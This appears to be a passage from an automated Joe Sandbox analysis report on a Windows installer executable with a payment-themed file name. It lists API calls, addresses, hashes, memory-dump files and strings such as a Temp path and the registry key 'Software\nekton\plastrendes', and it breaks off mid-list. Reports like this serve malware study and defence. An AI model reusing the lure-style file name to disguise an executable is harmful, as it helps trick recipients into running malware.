                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191
                              • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                              • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                            • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
                            • wsprintfA.USER32 ref: 004061CC
                            • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                            • GlobalFree.KERNEL32(00000000), ref: 004062B5
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                              • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                              • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                            • String ID: %ls=%ls$[Rename]
                            • API String ID: 2171350718-461813615
                            • Opcode ID: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                            • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                            • Opcode Fuzzy Hash: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                            • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                            • GetSysColor.USER32(00000000), ref: 00404525
                            • SetTextColor.GDI32(?,00000000), ref: 00404531
                            • SetBkMode.GDI32(?,?), ref: 0040453D
                            • GetSysColor.USER32(?), ref: 00404550
                            • SetBkColor.GDI32(?,?), ref: 00404560
                            • DeleteObject.GDI32(?), ref: 0040457A
                            • CreateBrushIndirect.GDI32(?), ref: 00404584
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                            • String ID:
                            • API String ID: 2320649405-0
                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                              • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: File$Pointer$ByteCharMultiWide$Read
                            • String ID: 9
                            • API String ID: 163830602-2366072709
                            • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                            • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                            • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                            • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                            • CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                            • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                            • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Char$Next$Prev
                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                            • API String ID: 589700163-4010320282
                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                            • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                            • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                            • GetMessagePos.USER32 ref: 00404E41
                            • ScreenToClient.USER32(?,?), ref: 00404E5B
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Message$Send$ClientScreen
                            • String ID: f
                            • API String ID: 41195575-1993550816
                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDC.USER32(?), ref: 00401E51
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                            • String ID: Times New Roman
                            • API String ID: 2584051700-927190056
                            • Opcode ID: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                            • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                            • Opcode Fuzzy Hash: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                            • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                            • MulDiv.KERNEL32(000629D9,00000064,000629DD), ref: 00402FDC
                            • wsprintfW.USER32 ref: 00402FEC
                            • SetWindowTextW.USER32(?,?), ref: 00402FFC
                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                            Strings
                            • verifying installer: %d%%, xrefs: 00402FE6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Text$ItemTimerWindowwsprintf
                            • String ID: verifying installer: %d%%
                            • API String ID: 1451636040-82062127
                            • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                            • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                            • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                            • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                            • GlobalFree.KERNEL32(?), ref: 00402A06
                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                            • String ID:
                            • API String ID: 2667972263-0
                            • Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                            • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                            • Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                            • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                            • GetClientRect.USER32(?,?), ref: 00401DE5
                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                            • DeleteObject.GDI32(00000000), ref: 00401E39
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                            • String ID:
                            • API String ID: 1849352358-0
                            • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                            • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                            • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                            • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                            • wsprintfW.USER32 ref: 00404DBA
                            • SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: ItemTextlstrlenwsprintf
                            • String ID: %u.%u%s%s
                            • API String ID: 3540041739-3551169577
                            • Opcode ID: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                            • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                            • Opcode Fuzzy Hash: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                            • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CharPrevlstrcatlstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 2659869361-3081826266
                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                            • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                            • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenA.KERNEL32(Software\nekton\plastrendes), ref: 00402695
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
